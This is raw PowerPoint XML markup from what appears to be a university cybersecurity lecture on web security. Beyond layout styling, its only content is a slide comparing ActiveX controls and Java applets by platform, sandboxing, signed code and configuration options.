            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{90696C2E-113D-8F4F-97AA-4895F71B68EA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42892912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940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83680" y="2596444"/>
            <a:ext cx="5527040" cy="618857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94080" y="9040143"/>
            <a:ext cx="2926080" cy="519289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12243854" y="9359900"/>
            <a:ext cx="240450" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55B28040-0FD8-C544-8357-9EE6C5A36700}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2020828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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9359900"/>
            <a:ext cx="13004800" cy="393700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="008751"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="1F4800"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000"/>
          </a:gradFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="127000" dist="25400" dir="18900000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="75000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>497: Special Topic - Cybersecurity</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 4"/>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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4200">
                <a:solidFill>
                  <a:srgbClr val="008751"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 5"/>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2pPr>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buChar char="-"/>
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="232323"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="AB1500"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buChar char="-"/>
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="232323"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr b="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="008751"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Body Level One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="232323"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Body Level Two</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="AB1500"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Body Level Three</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="232323"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Body Level Four</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="008751"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Body Level Five</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12115799" y="9359900"/>
            <a:ext cx="368505" cy="387070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-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9" r:id="rId8"/>
  </p:sldLayoutIdLst>
  <p:transition spd="med"/>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr defTabSz="584200">
        <a:defRPr sz="4200">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica Neue Light"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr indent="228600" defTabSz="584200">
        <a:defRPr sz="4200">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica Neue Light"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr indent="457200" defTabSz="584200">
        <a:defRPr sz="4200">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica Neue Light"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr indent="685800" defTabSz="584200">
        <a:defRPr sz="4200">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica Neue Light"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr indent="914400" defTabSz="584200">
        <a:defRPr sz="4200">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica Neue Light"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr indent="1143000" defTabSz="584200">
        <a:defRPr sz="4200">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica Neue Light"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr indent="1371600" defTabSz="584200">
        <a:defRPr sz="4200">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica Neue Light"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr indent="1600200" defTabSz="584200">
        <a:defRPr sz="4200">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica Neue Light"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr indent="1828800" defTabSz="584200">
        <a:defRPr sz="4200">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica Neue Light"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="266700" indent="-266700" defTabSz="584200">
        <a:spcBef>
          <a:spcPts val="3000"/>
        </a:spcBef>
        <a:buSzPct val="100000"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="711200" indent="-266700" defTabSz="584200">
        <a:spcBef>
          <a:spcPts val="3000"/>
        </a:spcBef>
        <a:buSzPct val="100000"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1155700" indent="-266700" defTabSz="584200">
        <a:spcBef>
          <a:spcPts val="3000"/>
        </a:spcBef>
        <a:buSzPct val="75000"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-266700" defTabSz="584200">
        <a:spcBef>
          <a:spcPts val="3000"/>
        </a:spcBef>
        <a:buSzPct val="100000"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2044700" indent="-266700" defTabSz="584200">
        <a:spcBef>
          <a:spcPts val="3000"/>
        </a:spcBef>
        <a:buSzPct val="75000"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2489200" indent="-266700" defTabSz="584200">
        <a:spcBef>
          <a:spcPts val="3000"/>
        </a:spcBef>
        <a:buSzPct val="75000"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2933700" indent="-266700" defTabSz="584200">
        <a:spcBef>
          <a:spcPts val="3000"/>
        </a:spcBef>
        <a:buSzPct val="75000"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3378200" indent="-266700" defTabSz="584200">
        <a:spcBef>
          <a:spcPts val="3000"/>
        </a:spcBef>
        <a:buSzPct val="75000"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3822700" indent="-266700" defTabSz="584200">
        <a:spcBef>
          <a:spcPts val="3000"/>
        </a:spcBef>
        <a:buSzPct val="75000"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:srgbClr val="008751"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:lvl1pPr algn="r" defTabSz="584200">
        <a:defRPr b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr indent="228600" algn="r" defTabSz="584200">
        <a:defRPr b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr indent="457200" algn="r" defTabSz="584200">
        <a:defRPr b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr indent="685800" algn="r" defTabSz="584200">
        <a:defRPr b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr indent="914400" algn="r" defTabSz="584200">
        <a:defRPr b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr indent="1143000" algn="r" defTabSz="584200">
        <a:defRPr b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr indent="1371600" algn="r" defTabSz="584200">
        <a:defRPr b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr indent="1600200" algn="r" defTabSz="584200">
        <a:defRPr b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Helvetica Neue"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr indent="1828800" algn="r" defTabSz="584200">
        <a:defRPr b="1">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t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t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4.t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1727200" y="2844800"/>
            <a:ext cx="9817100"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algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008751"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008751"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1727200" y="4762500"/>
            <a:ext cx="10706100" cy="31750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lgn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="232323"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232323"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Department of</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="232323"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="232323"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>York College of Pennsylvania</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ActiveX vs. Java </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6716814" y="2198237"/>
            <a:ext cx="5527040" cy="6188570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java Applet </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Platform-independent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>via browser plugin </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java code running within browser </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sandboxed execution </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Support for signed code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applet runs only on site where it is embedded </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applets deemed trusted by user can escape sandbox </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{90696C2E-113D-8F4F-97AA-4895F71B68EA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975360" y="2198237"/>
            <a:ext cx="5527040" cy="6188570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ActiveX Control </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows-only technology runs in Internet Explorer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Binary code executed on behalf of browser </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can access user files </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Support for signed code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An installed control can be run by any site (up to IE7) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IE configuration options </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, deny, prompt </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>approval </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
